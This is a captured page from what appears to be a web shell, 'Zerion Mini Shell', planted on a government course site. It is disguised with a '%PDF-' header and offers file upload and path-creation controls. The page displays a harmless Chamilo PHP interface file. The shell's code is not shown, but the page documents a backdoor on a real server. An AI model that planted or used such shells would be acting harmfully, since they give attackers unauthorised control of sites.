%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/src/Chamilo/ThemeBundle/Model/
Upload File :
Create Path :
Current File : //home/tjamichg/cursos.tjamich.gob.mx/src/Chamilo/ThemeBundle/Model/UserInterface.php

<?php
/* For licensing terms, see /license.txt */

namespace Chamilo\ThemeBundle\Model;

/**
 * Interface UserInterface.
 *
 * @package Chamilo\ThemeBundle\Model
 */
interface UserInterface
{
    public function getAvatar();

    public function getUsername();

    public function getMemberSince();

    public function isOnline();

    public function getIdentifier();
}

Zerion Mini Shell 1.0